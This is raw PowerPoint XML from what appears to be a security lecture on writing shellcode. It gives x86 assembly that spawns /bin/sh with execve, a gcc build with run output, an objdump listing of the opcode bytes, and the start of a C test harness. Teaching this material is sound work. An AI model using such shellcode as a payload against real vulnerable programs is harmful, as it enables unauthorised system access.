              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>register</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>0x80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>instruction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="121989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06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06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06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06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06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06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067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0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dirty="0" smtClean="0"/>
              <a:t>Preliminary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="542723" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>.data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh</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.string "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh</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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>.text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>globl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</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$11,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</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sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebx</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push 	$0	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	push	$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ecx</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$0,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%edx</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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   	$0x80	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  	$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x1,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	$0x0,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%ebx </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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	$0x80</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4074289" y="1252960"/>
            <a:ext cx="5069711" cy="1107996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>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ragnuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] $ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> –m32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>preliminary_shellcode.s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>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ragnuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] $./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh-41.$</a:t>
            </a:r>
          </a:p>
          <a:p>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72432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27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27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27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272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272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272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272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272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272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4272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4272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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-m32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>preliminary_shellcode.s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>prelim</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>prelim</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1800" dirty="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08048394 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;: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8048394</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:       b8 0b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$0xb,%eax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8048399</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bb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 1c 96 04 08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$0x804961c,%ebx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804839e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:       6a 00                   push   $0x0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80483a0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:       68 1c 96 04 08          push   $0x804961c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80483a5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:       89 e1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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>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80483a7</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ba</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$0x0,%edx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80483ac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>: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80483ae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:       b8 01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$0x1,%eax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80483b3</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bb</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$0x0,%ebx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80483b8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>: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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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197</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="115223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a:t>Testing the Shell Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="545795" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="B00040"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
